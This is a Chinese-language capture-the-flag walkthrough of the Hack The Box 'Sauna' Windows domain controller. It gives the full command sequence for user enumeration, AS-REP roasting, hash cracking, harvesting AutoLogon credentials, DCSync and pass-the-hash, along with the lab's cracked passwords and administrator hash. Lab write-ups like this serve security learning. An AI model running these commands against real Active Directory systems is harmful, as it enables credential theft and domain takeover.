[Meachines] [Easy] Sauna DC域+AS-REP+TGT票证窃取+AutoLo…

2024-09-21 44 0

信息收集

IP Address Opening Ports
10.10.10.175 TCP:53,80,88,135,139,389,445,464,593,3268,3269,5985

$ nmap -p- 10.10.10.175 --min-rate 1000 -sC -sV

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-16 03:21:43Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/15%Time=5E4844A2%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

AS-REP

https://github.com/ropnop/kerbrute/releases

$ ./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175

[Meachines] [Easy] Sauna DC域+AS-REP+TGT票证窃取+AutoLo…插图

fsmith
scoins
sdriver
btayload
hbear
skerb

$ impacket-GetNPUsers 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hash -dc-ip 10.10.10.175

[Meachines] [Easy] Sauna DC域+AS-REP+TGT票证窃取+AutoLo…插图1

$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt --force

[Meachines] [Easy] Sauna DC域+AS-REP+TGT票证窃取+AutoLo…插图2

$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

User.txt

71e35e9fbf8735a2198ccc859b6abda4

权限提升

fsmith –> svc_loanmgr

*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /home/maptnh/Desktop/htb/winPEASx64.exe C:\Windows\Temp\winPEASx64.exe

*Evil-WinRM* PS C:\Users\FSmith\Documents> C:\Windows\Temp\winPEASx64.exe

[Meachines] [Easy] Sauna DC域+AS-REP+TGT票证窃取+AutoLo…插图3

AutoLogon 凭据

[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!     

$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'

[Meachines] [Easy] Sauna DC域+AS-REP+TGT票证窃取+AutoLo…插图4

svc_loanmgr –> administrator (TGT票证 & DCSync)

$ impacket-secretsdump 'svc_loanmgr:[email protected]'

[Meachines] [Easy] Sauna DC域+AS-REP+TGT票证窃取+AutoLo…插图5

$ impacket-wmiexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 [email protected]

[Meachines] [Easy] Sauna DC域+AS-REP+TGT票证窃取+AutoLo…插图6

Root.txt

29691ff6c8f14b6987210c77d64fc4a4


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论